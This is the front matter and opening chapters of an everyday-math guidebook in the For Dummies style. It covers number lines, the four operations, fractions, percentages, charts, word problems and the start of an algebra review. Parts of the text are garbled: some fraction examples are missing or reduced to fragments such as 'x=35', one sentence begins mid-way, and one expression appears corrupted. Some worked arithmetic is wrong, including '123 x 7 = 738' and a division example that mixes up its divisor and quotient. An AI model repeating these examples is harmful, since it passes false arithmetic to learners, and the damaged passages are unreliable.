Introduction


Math is great. I’ve spent my life enjoying math and getting
the benefits from it. But many people don’t think math is so 
hot: They have fear and loathing. 


The trouble is, a lot of what you learned in school probably was 
boring or painful, and most likely you forgot it right away. Or you 
may have deliberately not learned some types of math at all just 
to save yourself the trouble of forgetting them later. Why? Mainly 
because a lot of the math taught in schools wasn’t math you could 
use. Well, that nonsense stops here, because this book is filled 
with math you can use. Here’s just a brief sampling of the areas 
where you'll find real-life math to be useful: 


At home, math comes in handy in the house, yard, workshop,
and hobby room. It’s also a big part of cooking in the kitchen,
whether you’re following a recipe or counting sticks of celery.


The grocery store and shopping center are the places where
most people buy the most items with the most frequency. You 
can use math when you’re shopping to make better choices 
and get better deals. 


Real-life math helps with understanding food labels, losing 
weight, and exercising. You can get healthy by chance, but 
choice is better, and math helps you make choices. 


On the job, you’ll find that a brush-up on math skills is very 
handy, whether you’re filling out a timesheet, managing time 
on a project, making change, or doing any other math-related 
tasks. 


About This Book 


Math for real life is math you need, because math for real life is 
math you use. And that’s what I focus on in this book, which is 
different from other math books. Here’s a quick rundown of the 
major differences: 


This book is all about practical math. Although I cover math
fundamentals (which are the building blocks of math for real 
life), I quickly move to problems you might deal with every 
day and the specific math skills you need to handle them. 
Other math books are often filled with abstractions.


The book doesn’t include any high-level equations, because
you don’t need them to go shopping or to calculate your auto 
repair bill. Even the world of gambling operates on simple 
formulas. 


It takes a comprehensive look at applying math in real-life 
areas. I include a little bit about a lot of subjects, and no 
subject goes any deeper than you need it to go. Many books 
are devoted to one subject (for example, algebra, geometry, 
trigonometry, or pre-calculus). Not this one — it’s devoted to 
everything. 


It’s not dull (I hope), as other math books often are. Because
it’s a For Dummies book, you can be sure that it’s easy to read 
and has touches of humor. 


But wait! There’s more! At the risk of sounding like a late-night 
infomercial, you'll find other unique features that I gar-on-tee you 
won’t find in a more traditional math book: 


You get terms, definitions, and word origins. The reason is 
that topics such as investments and insurance use so many 
odd words — and they need to be defined and explained. 


You get special insights into our culture and the way we think. 
For example, a “sale” isn’t always a sale, and “free” doesn’t 
always mean free. Even so, we tend to buy. Math for real life 
shows you where the exaggerations are. 


Conventions Used in This Book 


This book is user-friendly: easy to hold in your hands, easy to read, 
and easy to understand. On top of that, it’s easy to navigate, too, 
because the table of contents, the index, and the “In This Chapter” 
section at the beginning of each chapter help you find information 
you're looking for. 


The book uses the following conventions:


Italic type highlights new terms. Once in a great while, you'll
see italics used for emphasis. 


Although English teachers would cringe at my breaking the 
rules, I usually write numbers as numerals, not words. For 
example, the text will say “if you drive 30 miles on 2 gallons of 
gas,” not “if you drive thirty miles on two gallons of gas.” 


Variables in formulas appear as italics (for example, 3a + 4b = 10).


Web addresses are in monofont. They are usually very short
and shouldn’t break across two lines of text. But if they do, no 
extra characters indicate the break. Just type what you see 
into your browser. 


What You’re Not to Read


It would be great if you read all the words of this book in the order 
they appear, but life is short. You don’t have to read chapters that 
don’t interest you. This is a reference book, and it’s designed to let 
you read only the parts you need. And if you get stuck, then you 
can go over to a chapter you skipped to get some help. 


Here’s a short list of “skippable” information. Information in these 
bits isn’t essential to doing real-life math: 


You don’t have to read anything with a Technical Stuff icon 
next to it. That text gives you a little extra information about 
a technique, the origin of a principle, or maybe a formal 
definition. 


Sidebars (that’s what they’re called in publishing) are blocks
of text with a gray background. They are interesting (I think), 
but aren’t critical to your understanding the main text. 


Foolish Assumptions 


The book makes some assumptions about you and what you’re 
looking for in a math book: 


You were exposed to math fundamentals in elementary 
school but may have forgotten a few of them. (Why not 
high school? Because in high school many people get bored, 
dazed, or frustrated with mathematics. So although you may 
have been in class, your mind was probably somewhere else.) 
Even if you missed some basic math concepts in school, don’t 
fret: I review most of them in this book. 


 You’re only interested in information that’s relevant to you 
and are likely to skip concepts you’re already comfortable 
with. That’s okay. This is a reference book, not a novel. 


You have access to a computer and the Internet. Although 
not essential, being able to access the Internet is very handy. 
You can use a search engine to find useful specialized 
calculators or to learn more about any topic in this book.


How This Book Is Organized


This book has four parts, each representing a particular math topic. 
The chapters in the parts focus on different aspects of that topic. 
Overall, the book moves from an early review of basics to chapters
about math that comes up in everyday life to topics related to
personal finance. Of course, you don’t have to read the chapters in the
order they appear. Following is an overview of the kind of
information you can find in each part.


Part I: Boning Up on Math Basics 


In this part, you get math basics, which amount mostly to counting
and simple arithmetic. Chapters 1, 2, and 3 bring out broad
concepts related to the arithmetic fundamentals. In Chapter 4, you 
work with simple and useful statistics. Chapter 5 is about mental 
math, a great shortcut when you don’t have a calculator handy 
(which is most of the time). 


Part II: Math for Everyday Activities


Part II shows you how to do the calculations that spring up regularly
in real life. Want to seed your lawn or plant a flower bed? Math
is involved. How about preparing a dinner for six from a recipe
designed to feed four? You need math for that, too. Ever tried to 
decide whether the higher-priced but bigger box of cereal is a 
better deal than the lower-priced but smaller box? Again, math 
comes to the rescue. Shopping, cooking, driving around town, 
dining out, or trying to lose weight — math makes all these tasks 
easier. 


Part III: Math to Manage
Your Personal Finances


True, you may deal with personal finances daily, but they represent 
a sort of “special” kind of math. To handle these tasks well, you 
need to understand some general principles, a few specialized 
terms, and a few strategies. Fortunately, this part has you covered. 
Here you can get info to create a budget, better manage your bank 
account and check register, avoid credit card debt, invest more 
wisely, and more.


Part IV: The Part of Tens


What better way to end a book chock-full of easy-to-apply math 
formulas and principles than a couple of lists highlighting 
calculations you can do in your head and games you can play to 
build your math skills and sharpen your critical thinking? Consider 
this the icing-on-top-of-the-cake part. 


Icons Used in This Book 


In the margins of this book you'll see small drawings called icons. 
Each icon calls out a special kind of information. 


A tip is a suggestion or a recommendation. It usually points out a
quick and easy way to get things done or provides a handy piece of
extra information.


A warning alerts you to conditions that, if you’re not careful, could
lead you to wrong answers, faulty conclusions, or otherwise mess
up your day.


This icon appears beside information that’s important enough to
keep in mind, both for the task at hand and in general.


I use this icon to share esoteric or otherwise interesting but
non-essential information.


Where to Go from Here 


You can go to any chapter of the book from here. Although I’ve 
written this book so that the basic info comes first, you can start 
anywhere you want. Need a little more guidance? Here are some 
suggestions: 


If you’re browsing for a topic that piques your interest, check 
out the table of contents. Here you can see all the topics this 
book covers. Chances are one (or more) will call to you 
immediately. You can also try the “thumb test”: Riffle through 
the pages until something catches your eye. 


If you haven’t made a choice, begin with Chapter 1. It has 
broad concepts and is a good launching pad into the 
discussions elsewhere in the book.


If you have a particular problem (for example, maybe with
shopping or investments), head to the table of contents or the 
index to find what you’re looking for. 


If you get stuck at any time, you’ll probably find another chapter 
that can help you out. Just stop what you’re reading and go visit 
that chapter. 


Part I
Boning Up on Math Basics


The 5th Wave By Rich Tennant


I’m mathematically dyslexic.
But it’s not that unusual -
100 out of every 15 people are.


In this part... 


In this part, you'll find a review of math basics,
including simple math concepts from your school 
days, like numbers, counting, and arithmetic operations. 


You also discover math principles like ratio-proportion, 
conversions, and statistics and probability. I also share 
the best all-purpose calculation method. Chapter 5, which 
is all about doing simple math in your head, is a math 
bonus. Mental math is a handy tool, and the techniques 
aren’t hard to learn.


Awesome Operations:
Math Fundamentals


In This Chapter 
Reviewing the four arithmetic operations 
Manipulating fractions 
Using charts to convey and understand information 


Strategies to help you solve word problems 


Math has basic operations that you need to know. These
operations — addition, subtraction, multiplication, and 
division — make all the other math in this book possible. 


The good news is that you most likely learned about basics (like 
counting) even before you entered school, and you learned about 
basic arithmetic operations in elementary school. So you’ve been 
at it for a long time. 


In this chapter, I review counting and the fundamentals of the four 
basic arithmetic operations. Other important topics I cover here 
are fractions, percentages, charts and graphs, and word problems. 
But don’t worry: None of these are mysterious. 


Numbers You Can Count On


The most fundamental component of math is numbers. The first 
thing you do with numbers is count, and you probably started 
counting when you were very young. As soon as you could talk, 
your mother cajoled you to tell Aunt Lucy how old you were or to 
count from 1 to 5. 


Counting was the first and most useful thing you did with math, and
you still use it every day, whether you’re buying oranges at the grocery
store or checking the number of quarts of motor oil in a case.


fact, the Ishango bone is a tally stick (a counting stick), and it’s
over 20,000 years old! 


Several kinds of numbers exist. Over time, mathematicians have 
given them many names. The two most important kinds are whole 
numbers and fractions. To see a little bit about how these numbers 
work, use a number line, a simple display of numbers on a line (see 
Figure 1-1). 


-9 -8 -7 -6 -5 -4 -3 -2 -1 0 1 2 3 4 5 6 7 8 9


Illustration by Wiley, Composition Services Graphics 


Figure 1-1: A number line. 


The numbers to the right of 0 are called natural numbers or counting 
numbers. Of course, they are the numbers you use to count. 
They’re easy for anyone to work with because they represent
how many of something someone has (for example, 6 apples or 3
oranges).


Over many centuries and in different cultures, people made up the 
number 0, which represents the lack of a quantity. The numbers 
to the left of 0 on the number line, negative numbers, are a harder 
concept to grasp. You recognize negative numbers in real life. For
example, if your checking account is overdrawn, you have a 
negative balance. If someone owes you $3.00, you have “negative 
cash” in your pocket. 


Here are the key points to know about the number line: 


All the numbers you see in Figure 1-1 are whole numbers, also 
called integers. An integer is a number with no fraction part. 
The word comes from Latin, and it means “untouched,” so it’s 
the whole deal. 


The numbers to the right of zero are positive integers. The 
numbers to the left of zero are negative integers. 


Mathematicians (and I’m not making this up) have trouble 
with zero. The best they can do is attach it to the positive 
integers and label the group non-negative integers. 


The number line stretches to the left and right, to infinity and 
beyond (as Buzz Lightyear says). 


Decimals (such as 0.75) and regular fractions (such as 3/5) 
are only a part of a whole number. They all have a place 
somewhere on the number line. They fit in between the 
integers. For example 2.75 “fits” between 2 and 3 on the 
number line, because it’s greater than 2 but less than 3.


Reviewing the Four Basic
Operations


To do any sort of math, you need to know your math basics. The 
four basic operations — addition, subtraction, multiplication, and 
division — let you take care of all kinds of real life math. But what’s 
also very important is that those same basic math operations allow 
you to handle fractions and percentages, which come up all the 
time in ordinary math tasks. Later (in Chapter 2), these operations 
form the basis for managing algebra equations and geometry. 


The core operations are addition and subtraction. You very likely 
know what they are and how they work. Multiplication and division 
are “one step up” from addition and subtraction. The following 
sections give you a quick review of these four operations. 


Addition 


Addition is a math operation in which you combine two or more 
quantities to get (usually) a larger quantity. Addition was probably 
the first math you ever did. 


You can add numbers (called the operands) in any order. This 
property (that is, the ability to perform the operation in any order) 
is called commutativity. 


21 + 31 + 41 + 51 = 144
is equal to
51 + 41 + 31 + 21 = 144


No matter in what order you add the operands, the sum still 
equals 144. 


Subtraction 


Subtraction is a math operation in which you take away the value 
of one number from another, resulting in (usually) a smaller 
quantity. 


In subtraction, the order of the operands is important. You can’t 
rearrange the numbers and get the same answer. For example, 
77 - 22 (which equals 55) is not the same as 22 - 77 (which
equals -55).


Multiplication 


Think of multiplication as repeated addition. For example, you 
likely know that 3 x 4 = 12, but you can also get there by adding 3 
four times: 


3 + 3 + 3 + 3 = 12


The technique also works for large numbers. For example, 123 x 7 
= 738 is equivalent to this: 


123 + 123 + 123 + 123 + 123 + 123 = 738


But who wants to do all that adding?


Here’s the best advice for multiplication:


For little numbers, know your multiplication table. It’s easy, 
up to 10 x 10. 


For big numbers, use a calculator.


As with addition, you can multiply the numbers in a list in any
order. The expression 3 x 4 is the same as the expression 4 x 3.
Both equal 12.


Division


Division is essentially “multiple subtraction.” In a simple problem
such as 12 ÷ 4 = 3, you can get the result by subtracting 3 four
times from the number 12.


12 ÷ 3 = 4 with no remainder
is equal to
12 - 3 - 3 - 3 - 3 = 0 (4 subtractions with no remainder)


In division, the order of the operands is important. You can’t 
rearrange them and end up with the same answer. 


Finagling Fractions 


Fractions take several forms, but in real life, the forms you deal 
with are common fractions and decimal fractions. 


A common fraction has two parts. The numerator is the top number, 
and the denominator is the bottom number. You don’t have to 
learn these words, however. Just think “top number” and “bottom 
number.”


numerator / denominator


What do you do with fractions? Arithmetic operations and 
conversions, that’s what. 


A common fraction is sometimes called a simple fraction or a vulgar 
fraction. The vulgar fraction isn’t really rude; vulgar is just another 
word for common (from the Latin vulgus, meaning “common
people”).


Getting familiar with 
types of fractions 


Like the popular ice cream parlor, fractions come in several flavors. 
Not 31 flavors, however. For this book, you have to remember only 
a few fraction types: 


Proper fraction: In a proper fraction, the numerator is smaller 
than the denominator (for example, 4). 


Improper fraction: In an improper fraction, the numerator is 
larger than the denominator (for example, 9). Think “Honey, 
does this numerator make my fraction look big?” 


Mixed fraction: A mixed fraction is a combination of a whole
number and a fraction. Here’s an example of a mixed fraction: 
3 
17 


Decimal fraction: A decimal fraction uses a decimal point (for 
example, 0.23, 1.75, or $47.25). 


Decimals are fractions, too, even though they don’t look like the 
other types of fractions. Look at this: 0.75 is a decimal. But what 
does that really mean? It means 75/100. 


Reducing fractions 


Here’s fair warning: Doing fraction math often produces “clumsy” 
fractions. By clumsy, I mean unwieldy proper fractions (48/60, for 
example) and bad-looking improper fractions (37/16, for example). 
They are handy during the calculations but are very inconvenient 
as final answers. 


You turn a clumsy fraction into something lovely to behold by 
reducing it.


Reducing proper fractions


You reduce proper fractions by finding a number that the numerator
and denominator share and then separating it out. This tactic is
called factoring, and multiplication rules allow you to do it. For
example, for the fraction 48/60 you “break out” the common factor 12
in both the numerator and denominator:


48/60 = (4 x 12)/(5 x 12)
48/60 = 4/5 x 12/12
48/60 = 4/5 x 1
48/60 = 4/5


When a fraction has the same numerator and denominator, it’s
equal to 1. Hence, 12/12 becomes 1.

Another way of describing this is to say, “You reduce a proper 
fraction by dividing the top and bottom numbers by the same 
number.” 


Reducing improper fractions 

To reduce an improper fraction, you break it into whole numbers
and a remaining, smaller fraction. To do this, you divide the
top number by the bottom number, and then you use the whole
number and the remaining fraction to form a mixed fraction. Here’s
an example:


49/16 = (16 + 16 + 16 + 1)/16
49/16 = 3 1/16


Adding, subtracting, multiplying, 
and dividing fractions 


Fractions are just numbers. Like integers, you can add, subtract, 
multiply, and divide them. Before you panic, keep in mind that you 
perform these math calculations on fractions all the time. Don’t 
believe me? Think about money.


At first, dollars and cents don’t look like fractions because they’re
in decimal form. But they are fractions, for sure. To look at the 
details, take a gander at the following sections. 


Addition 


To add two fractions, the fractions must have the same denominator 
(also called a common denominator). After the denominators are 
the same, you add fractions simply by adding the numerators. 


When the denominators aren’t the same, you need to make them 
the same. You can’t directly add 1/2 pie to 1/4 pie to get 3/4 pie, for 
example. You need to convert the 1/2 pie into quarters (2/4 pie). 
Figure 1-2 shows what adding pieces of pie looks like. 


Illustration by Wiley, Composition Services Graphics


Figure 1-2: Adding Fractions. 


Getting the denominators the same is easy because you're allowed 
to multiply both the top number and the bottom number by the 
same number. In the pie example, you multiply both numerator 
and denominator of the fraction 1/2 by 2: 


x = 1/2 x 2/2
x = (1 x 2)/(2 x 2)
x = 2/4


After you have all operands in 1/4 pie units, adding 2/4 and 1/4 to 
get 3/4 is easy. (Remember that the denominator stays the same 
when you add the numerators.)


Subtraction


To subtract two fractions, the fractions must have a common 
denominator (just as they must in addition); then you simply 
perform the operation on the numerators. 


If the denominators aren’t the same, you need to make them the 
same before you can subtract. For example, you can’t directly 
subtract 1/4 pie from 1 whole pie (which in fraction form is 1/1) 
to get 3/4 pie because the denominators are different. Again, you 
need to convert the whole pie into quarters, and you do that by 
multiplying the numerator and denominator by 4 to get 4/4 pie. 
Then you can do the subtraction:


x = 4/4 - 1/4
x = 3/4


After all the operands are in 1/4 pie units, subtracting 1/4 from 4/4
to get 3/4 is easy. (Remember that the denominator stays the same
when you subtract the numerators.)


Multiplication 


Compared to adding and subtracting fractions, multiplying fractions 
is easy. Just multiply the numerators, multiply the denominators, 
and then reduce. 


x=35 


The answer is 18/35. When possible, try to reduce the result. In 
this case, you can’t reduce 18/35 at all. 


Division 

Here’s the secret to dividing fractions: Invert and multiply. That is, 
flip the second fraction so that the numerator is on the bottom and 
the denominator is on the top, and then multiply as you would any 
other fraction. 


Say you want to divide 1/4 by 2. (Note: The fraction form of a
whole number is that number over 1.) The answer is obviously 1/8.
Not so obvious, you say? Here’s how you get the answer:


x = 1/4 ÷ 2
x = 1/4 ÷ 2/1
x = 1/4 x 1/2
x = 1/8


You follow the same process when you want to divide a fraction by
a fraction:

=t 

x=1x3 

= 


Notice that dividing by a fraction yields a higher result than 
dividing by a whole number. 


You can’t divide by 0. It’s mathematically impossible. The old 
saying is, “Never divide by zero! It’s a waste of time, and it annoys 
the zero.” 


Converting fractions 


The handiest fraction conversions are turning common fractions 
into decimal fractions and turning decimal fractions into common 
fractions. 


A fraction is a ratio, too 


In math, a ratio is a relationship between two numbers. I mention this because
ratios come up all the time.


The size of a wide-screen DVD image is called the aspect ratio, usually 16:9. That
amounts to 16 inches of width for every 9 inches of height, and it doesn’t really
matter how big your TV screen is. The ratio is always the same.


If you have a gas-powered weed eater (also known as a string trimmer or weed
whacker), you've probably bought 40:1 2-cycle engine oil for it. The 40:1 ratio means
that you mix 40 parts gas to 1 part oil.


Turning a common fraction into a decimal fraction


To turn a common fraction into a decimal fraction, just divide the 
denominator into the numerator. A number like 4/5 easily turns 
into 0.80 when you divide 4 by 5. 


Don’t be surprised or alarmed if some division doesn’t come out 
“even.” For example, the decimal equivalent of 1/3 is 0.333333333 
(and the 3s go on forever). If you see a sale item marked “33% off,” 
it’s been reduced by 33 percent or about 1/3. If the item is marked 
“20% off,” it’s been reduced by 20/100, or 1/5. (See the section 
“Processing Percentages” for the lowdown on how to work with 
percentages.) 


Turning a decimal fraction into a common fraction 


To turn a decimal fraction into a common fraction, just express the 
decimal as a fraction and reduce the fraction. 


A decimal with one decimal place (0.6, for example) needs a fraction 
with 10 in the denominator. A decimal with two decimal places 
(0.25, for example) needs a fraction with 100 in the denominator, 
and so forth. Here are some examples: 


0.6 = 6/10
0.71 = 71/100
0.303 = 303/1000


Notice that the number of zeroes in the denominator is the same 
as the number of decimal places in the decimal fraction. 


For example, say you want to convert 0.375 into a fraction. Here’s 
how you’d go about it: 


x = (3 x 125)/(8 x 125)
x = 3/8 x 1
x = 3/8


In this example, when you “factor out” 125 from both the numerator 
and denominator, the result is the common fraction 3/8. See the 
section “Reducing proper fractions” for details on factoring.


Processing Percentages


A percentage is a fraction whose denominator never changes. 
It’s always 100. A number like 33 percent, for example, refers to 
33 parts in 100, or 33/100, or 0.33. You see percentages written 
as “33%” and “33 percent.” No matter how it’s written, it’s just 
another way of saying “thirty-three parts in one hundred.” 


Percent and per cent mean “per centum,” which is from the Latin
phrase meaning “by the hundred.” So a percentage always refers to 
a number of parts out of 100. 


Percentages are especially handy for comparing two quantities. 
For example, if one beer contains 5.5 percent alcohol and another 
contains 12 percent alcohol, you can be sure that the “high octane” 
beer has a lot more punch. 


Percentages also let you compare values to an arbitrary standard. 
Nutrition labels are a good example. They compare items in food,
such as dietary fiber, cholesterol, or vitamins and minerals, to the 
Dietary Reference Intake (DRI) nutrition recommendations used by 
the United States and Canada. 


A percentage is a dimensionless proportionality, meaning that it 
doesn’t have a physical unit. Fifty percent of a length is still 
50 percent, whether you’re talking about feet or light years. 


Converting a common fraction 
to a percentage 


Sometimes you want to convert a fraction to a percentage. Say, for 
example, that you’re fed up with your commute to work, because 
the drive requires 1 hour each way. You’re at the job for 9 hours, 
so work consumes 11 hours of your day, 2 of those hours with 
you sitting in traffic. While stuck in bumper-to-bumper traffic, you
wonder what percentage of your work-related time is spent
commuting. The fraction is 2/11, so what’s the percentage?


To convert a common fraction into a percentage, just divide the 
numerator by the denominator and multiply the result by 100:


percentage = 2/11 x 100
percentage = 0.1818 x 100
percentage = 18.18


You can see that 2/11 is about 18 percent. What could be simpler 
than that?


A percentage is a ratio, too


As I mention earlier, a ratio is a relationship between two numbers. A percentage
can often be expressed as a ratio. For example, if a bottle of vodka contains 40 
percent alcohol (which, confusingly, is called 80 proof in the United States), that 
means that 40 parts in 100 are alcohol. That's a ratio of 40:60, 40 parts of alcohol to 
60 parts of water. 


You can convert from a ratio to a percentage, too. For example, a “four to one” 
martini has a gin:vermouth ratio of 4:1. The vermouth is 1/5 of the cocktail, or 
20 percent. 


Converting a percentage 
to a fraction 


Sometimes a fraction may be more convenient than a percentage. 
Perhaps you want to know what fraction of your salary goes to 
taxes. Or maybe you're less inclined to eat a whole 8-ounce bag of 
chips when you think in terms of it having 1/2 rather than 50 percent 
of your daily recommended amount of sodium. 


To convert a percentage into a common fraction, just divide the 
percentage by 100 and reduce the result. For example, say you want
to convert 80 percent into a common fraction: 


80 percent = ???
80 percent = 80/100
80 percent = (4 x 20)/(5 x 20)
80 percent = 4/5 x 20/20
80 percent = 4/5


The value 80 percent means 80/100. Form a fraction and reduce it. 
As you can see, 80 percent is 4/5. 


Grasping Charts and Graphs 


A chart or graph is a visual representation of numbers. Charts and 
graphs come in many forms, but for day-to-day math, you need to 
know about only three kinds — the line chart (or graph), the pie 
chart, and the bar chart.


The key point is that a chart is visual, and people usually find a
visual display to be more understandable than a list of numbers.
Expect to encounter charts when you read about the economy
or when you compare consumer products. Also, the best thing is
that you can make your own charts, which you may want to do, for
example, to get a better picture about your personal finances.


Looking at line charts 


A line chart (sometimes called a line graph) displays information 
as data points connected by a line. With this chart, you can easily 
see how an item is trending. Figure 1-3 shows typical temperatures 
over a week. What can you glean from this data? That the weekend 
was hot!


Figure 1-3: A line chart.


A line chart can easily show you how the economy is doing. Think 
unemployment figures. Also, you can make a chart that shows how 
one (or all) of your investments is doing. 


Gobbling up pie charts 


A pie chart looks like, er, a pie, which is divided into “slices” that 
show the relative proportion of various elements. This type of 
chart lets you see both the relationship between elements and the 
relationship of individual elements to the whole pie. 


Pie charts are great when you have to compare only a few elements. 
When you must compare many elements, the slices get too thin 
and they’re harder to understand. 


Figure 1-4 shows a typical monthly budget. After paying the 
rent, making the car payment, and buying food, you can see that 
not much is left for everything else. Note that it doesn’t matter 
whether you make $1,000 a month or $10,000 a month. The pie 
chart shows relative proportions.


Figure 1-4: A pie chart.


A pie chart is great for making comparisons of government 
expenses relative to each other. And seeing where your tax money 
goes is always fun. Visit the Center on Budget and Policy Priorities: 
http://www.cbpp.org/cms/index.cfm?fa=view&id=1258. 


Bellying up to bar charts 


A bar chart has rectangular bars that can be either horizontal or 
vertical. The size of the bars represents bigger or smaller values. 


Bar charts are great for showing anything over time, including 
variable income, variable expenses, and even the number of 
burgers sold at the local drive-in. Figure 1-5 is a bar chart that 
shows what my Visa bill was for seven months. Can you tell when I 
went on vacation? 


Figure 1-5: A bar chart. 


Working Wicked Word Problems 


Do you remember word problems (sometimes called “story 
problems”) from school? A few people loved them, but many 
people hated them. 


What’s peculiar is that most of life’s math problems start as word 
problems, a fact that’s understandable because we speak in words, 
not numbers. So if you say, “The boss gave me a 10 percent raise,” 
figuring out your new salary starts as a word problem. 


At first glance, some word problems appear to be baffling. But 
that’s just at first glance. You simply need to know a few tricks that 
can make all word problems easy to solve. The basic process for 
solving word problems is to first do some analysis and then do the 
math. 


Doing the analysis 


Two parts are involved in solving a story problem. The first part 
is to study the problem a little. That makes the second part (doing 
the math) easy. 


For example, a shed has a roof that’s 6 feet by 10 feet on each side. 
The barn’s roof is twice as long and twice as deep as the shed’s 
roof. Both buildings are red. If it takes 120 shingles to cover the 
shed’s roof, how many shingles does it take to cover the barn’s 
roof? 


When you analyze a story problem, you go through the problem to 
get the info you need to eventually solve it. Follow these steps: 


1. Read the problem and list the facts. 


Always read word problems more than once. Facts are 
hiding in the question. From the question, you know the 
dimensions of the shed roof on each side. You get a sense 
of the dimensions of the barn’s roof, and you know how 
many shingles are needed to cover the shed. Good! 


2. Figure out exactly what the problem is asking for. 


In every word problem, you run the risk of solving — 
correctly — for the wrong thing. So make sure you know 
what the question asks for. In the example, you know that 
the answer is “number of shingles to cover the barn.” The 
question could have been about calculating the number of 
shingles to cover both the shed and the barn, but it’s not. 


3. Eliminate excess information. 


Both real life and school story problems tend to have 
extraneous facts. Ignore them. For example, the fact that 
both buildings are red is interesting but not important. 


4. See what information is missing. 


Sometimes a major fact is missing. What’s more likely, 
however, is that the information is hiding. For example, the 
info that the barn’s roof is twice as long and twice as deep 
as the shed’s gives you a clue about calculating the area of 
the barn’s roof. 


5. Find the keywords. 


Be on the lookout for key words and phrases, such as “how 
much more,” “how much less,” and “total.” Those words 
and phrases usually indicate what kind of math operations 
are involved. 


Applying the math 


Almost every story problem uses a simple algebra formula that’s 
“hiding” in it. When you develop the formula, you then insert the 
numbers to solve the problem. Math instructors often call this last 
step “plug and chug.” 


To apply the math, take the info you gleaned from your analysis 
and do the following: 


1. Convert information supplied into information needed. 


First, use the given dimensions of the shed roof to calculate 
how many square feet are covered by 120 shingles. 

area (shed) = length × depth × 2 

area (shed) = 6 × 10 × 2 

area (shed) = 120 


The answer is 120 square feet. (Note: You multiply by 2 to 
take into account both sides of the shed’s roof.) 


Then use the given dimensions of the shed roof to calculate 
the area of the barn’s roof. The barn’s roof is twice as long 
and twice as deep as the shed’s roof. 

area (barn) = 2(shed length) × 2(shed depth) × 2 

area (barn) = 2(6) × 2(10) × 2 

area (barn) = 12 × 20 × 2 

area (barn) = 480 

The answer is 480 square feet. 


2. Apply a formula. 


There’s a technique called ratio-proportion. Don’t worry 
about the details now (I explain it fully in Chapter 3). Here, 
you apply the technique: 

known quantity (shed area) / known quantity (shed shingles) = known quantity (barn area) / desired quantity (barn shingles) 

120 / 120 = 480 / x 

120x = 57,600 

x = 480 


You cross multiply and solve. The answer is 480 shingles. 


Pay attention to units and phrase the answer in the units 
asked for. In the example, you must express the answer in 
shingles, not square feet. 


3. Check for reasonableness. 


Always make sure the answer is reasonable. Because 
the barn is bigger than the shed, the barn should take 
more shingles than the shed. The 120 versus 480 is one 
reasonableness check. In the example, if you get an answer 
of 48 shingles or 48,000 shingles, something is wrong. 


If you crave a shortcut, consider this: The fact that the barn’s roof 
is twice as long and twice as deep as the shed’s roof means that 
the barn’s roof has four times the area. With that info at hand, the 
calculation is easy: Simply multiply the shed’s 120 shingles by 4, 
giving you 480 shingles. 


Other story problem tricks 


If you find yourself totally stuck on a word problem, a few tricks 
may help you out: 


Draw a diagram. Sometimes, drawing a picture using the facts 
in the problem can be a help. This tactic works when you 
need to find the area of a garden, the board feet you need for 
a deck, or how old your brothers and sisters will be when you 
reach a certain age. 


Find a formula. When you encounter a problem about interest 
on your savings account or the amount of mortgage payments, 
chances are excellent that someone has already developed a 
formula to solve it. Chances are also very good that you can 
find an online calculator or an embedded function in a 
spreadsheet application to help you out. 


Develop a formula. Sometimes you can make your own 
simple formula instantly. For example, as soon as you know 
that a hamburger has 21 grams of protein and that dietary 
guidelines recommend 56 grams of protein a day, a little quick 
math (divide 56 by 21) shows that about three burgers at that 
backyard barbecue will give you a full day’s worth of protein. 
And a formula works all the time, after you develop it. 


Consult a reference. Using a reference isn’t just desirable; 
it’s also sometimes necessary. For example, if you’re painting 
a room, calculating the area to be covered isn’t hard (see 
Chapter 8), but it’s essential to consult the paint manufacturer’s 
information to learn how much area a gallon of paint will 
cover. 


Chapter 2 


High School Reunion: 
Revisiting Key Principles of 
Algebra and Geometry 


In This Chapter 
Understanding variables, constants, expressions, and equations 
Performing operations on algebraic equations 
Getting (re)acquainted with basic geometric shapes 
Using common formulas to determine area, perimeter, and volume 


Did you and math part ways? If so, you likely stopped dating 
each other and broke up in high school, which is when most 
students meet up with algebra and geometry for the first time. You 
may have avoided these math classes, or maybe you took them but 
didn’t pay as much attention as you should have. 


As it turns out, algebra and geometry have some super concepts, 
and those concepts have enormous practical value, as you see in 
the rest of this book. 


In this chapter, I take you back to high school for a reunion of 
sorts: I reintroduce you to some of the basic concepts and 
vocabulary of these two handy branches of mathematics. With 
those in hand, you'll be able to solve most algebra or geometry 
problems that come up in real life. 


“A” Stands for “Algebra” 
and “Awesome” 


Algebra is a branch of math that deals with variables and constants, 
and their relationship to each other in equations. When you solve 
a real-life math problem, chances are you’re using algebra. 


In this section, you get friendly with the names of the parts of an 
algebra statement. Then you go on to do simple (but essential) 
math operations. As you read through the next sections, keep 
these key points in mind; they may allay any trepidation you have 
about algebra: 


In algebra, letters represent numbers — that’s it. And they 
represent numbers only until you solve the problem and 
replace them with numbers. 


The operations used in algebra problems aren’t mysterious. 
You work on algebraic variables and constants, using the 
same math operations you use on numbers in “plain” arithmetic. 


Getting acquainted with variables 
and constants 


This sounds amazingly obvious, so get ready: Variables vary in 
value (until you determine what they are), and constants are 
constant in value. 


Oh, you're so variable 


A variable in algebra is a number whose value you don’t yet know, 
so it’s represented by a letter. The value of the variable may be 
anything, and that’s why it’s called a variable. The following are 
typical variables: 


a b c x 


In an algebraic statement, you often see more than one variable 
and maybe a number or two. Here’s an example: 


a+2=b 


You read and say the statement in almost the same way you'd say, 
“1 plus 2 equals 3.” Instead you just say “a plus 2 equals b.” 


The letters a and b represent unknown numbers, but when you 
know what a is and add 2 to it, you can figure out what b is. 
For example, if you learn that the variable a is equal to 5, then the 
example becomes this: 

5+2=b 


So the variable b is equal to 7. 


Variables can be any letter you want, but x is a very popular 
variable name. You’ve probably heard teachers, students, and 
co-workers talk about “solving for x.” Using x as a variable has 
a mysterious flavor, suggesting a great unknown. Think of The 
X-Files, “X marks the spot,” and Planet X (the Star Trek novel). 


Are your constants constant, Constance? 


The opposite of a variable is a constant. It has a fixed value. For 
example, look at 


a+2=b 


Note that 2 is a constant. If variable a changes, it causes variable b 
to change, but the constant 2 stays the same. 


Various types of numbers, such as 3, 2.5, 1/2, and π (pi) are constants. 
Constants can be numbers of any kind. 


Expressions and equations 


After you understand the difference between variables and constants, 
you can begin to form variables and constants into expressions 
and equations. 


Examining expressions 


When life gives you lemons, make lemonade. When math gives you 
variables and constants, make expressions. An expression is a 
combination of symbols and can be made up of variables, constants, 
or both. That’s it! 


An expression isn’t necessarily equal to anything; it’s like using a 
phrase rather than a whole sentence. Here’s a sample expression, 
made entirely of constants: 

34+4+5 


You can easily add these constants up. 


Here’s an expression made up entirely of variables: 


a+b+c 


In the example, you add some unknown quantity of something (a) 
to an unknown quantity of something else (b) and then add that to 
another unknown quantity (c). 


You can group variables and constants together to form an 
expression. The most popular way to group constants and variables 
